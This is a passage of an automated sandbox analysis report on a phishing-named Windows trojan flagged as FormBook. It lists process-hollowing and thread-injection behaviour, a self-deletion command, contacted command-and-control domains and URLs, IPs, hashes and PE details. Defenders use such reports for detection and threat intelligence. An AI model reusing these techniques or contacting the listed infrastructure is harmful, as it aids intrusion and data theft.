          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0040ACF0 LdrLoadDll,6_2_0040ACF0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exeDomain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exeDomain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C50000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"Jump to behavior
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.291644026.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.327163839.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.308348112.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.316504406.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.319632104.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.301501003.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528773 Sample: HSBC ... Wire Transfer Copy.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 7 other signatures 2->45 10 HSBC ... Wire Transfer Copy.exe 3 2->10         started        process3 file4 27 C:\...\HSBC ... Wire Transfer Copy.exe.log, ASCII 10->27 dropped 13 HSBC ... Wire Transfer Copy.exe 10->13         started        process5 signatures6 55 Modifies the context of a thread in another process (thread injection) 13->55 57 Maps a DLL or memory area into another process 13->57 59 Sample uses process hollowing technique 13->59 61 Queues an APC in another process (thread injection) 13->61 16 explorer.exe 13->16 injected process7 dnsIp8 29 www.piramsgprodiet.store 16->29 31 www.gramaltinrafineri.com 16->31 33 4 other IPs or domains 16->33 35 System process connects to network (likely due to code injection or exploit) 16->35 37 Uses ipconfig to lookup or modify the Windows network settings 16->37 20 ipconfig.exe 16->20         started        signatures9 process10 signatures11 47 Self deletion via cmd delete 20->47 49 Modifies the context of a thread in another process (thread injection) 20->49 51 Maps a DLL or memory area into another process 20->51 53 Tries to detect virtualization through RDTSC time measurements 20->53 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HSBC ... Wire Transfer Copy.exe17%VirustotalBrowse
          HSBC ... Wire Transfer Copy.exe40%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          gramaltinrafineri.com0%VirustotalBrowse
          catproductreviews.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo0%Avira URL Cloudsafe
          www.atlantiscompania.com/m4n8/0%Avira URL Cloudsafe
          http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb60%Avira URL Cloudsafe
          https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ghs.google.com
          		172.217.168.83
          		truefalse
            		high
            gramaltinrafineri.com
            		34.102.136.180
            		truefalseunknown
            catproductreviews.com
            		34.102.136.180
            		truefalseunknown
            www.catproductreviews.com
            		unknown
            		unknowntrue
              		unknown
              www.piramsgprodiet.store
              		unknown
              		unknowntrue
                		unknown
                www.gramaltinrafineri.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.gramaltinrafineri.com/m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPofalse
                  • Avira URL Cloud: safe
                  		unknown
                  www.atlantiscompania.com/m4n8/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.catproductreviews.com/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpfalse
                    		high
                    https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    34.102.136.180
                    		gramaltinrafineri.comUnited States
                    		15169GOOGLEUSfalse
                    172.217.168.83
                    		ghs.google.comUnited States
                    		15169GOOGLEUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528773
                    Start date:25.11.2021
                    Start time:18:55:52
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:HSBC ... Wire Transfer Copy.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:29
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@7/1@3/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 20.1% (good quality ratio 18.2%)
                    • Quality average: 73.7%
                    • Quality standard deviation: 31%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 68
                    • Number of non-executed functions: 164
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:56:46API Interceptor21x Sleep call for process: HSBC ... Wire Transfer Copy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log
                    Process:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):2239
                    Entropy (8bit):5.354287817410997
                    Encrypted:false
                    SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                    MD5:913D1EEA179415C6D08FB255AE42B99D
                    SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                    SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                    SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.856337226634709
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:HSBC ... Wire Transfer Copy.exe
                    File size:471552
                    MD5:99b154970d15748d1df9025f675ecc76
                    SHA1:75503611daf18643a401c2020ae9e045111b7f1f
                    SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
                    SHA512:9fd769b3292753089bf5e7a1bd805867cc80e670ad43b371cad39acd9124813ab17d7ca6a58211f40e295183ed0eafd22b8a6c4e271f30bf5a500bdfd7376786
                    SSDEEP:12288:6afBLr0oixBFmHFMrvCayGyIgA8flRFPpjxWkSHZ3t7fNv2RkY:Hf9r0oi15rPgqbHj7hyp
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.a..............0..(...........F... ...`....@.. ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x474616
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x619F4B56 [Thu Nov 25 08:37:42 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [ebp+0800000Eh], ch
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x745c40x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x5cc.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
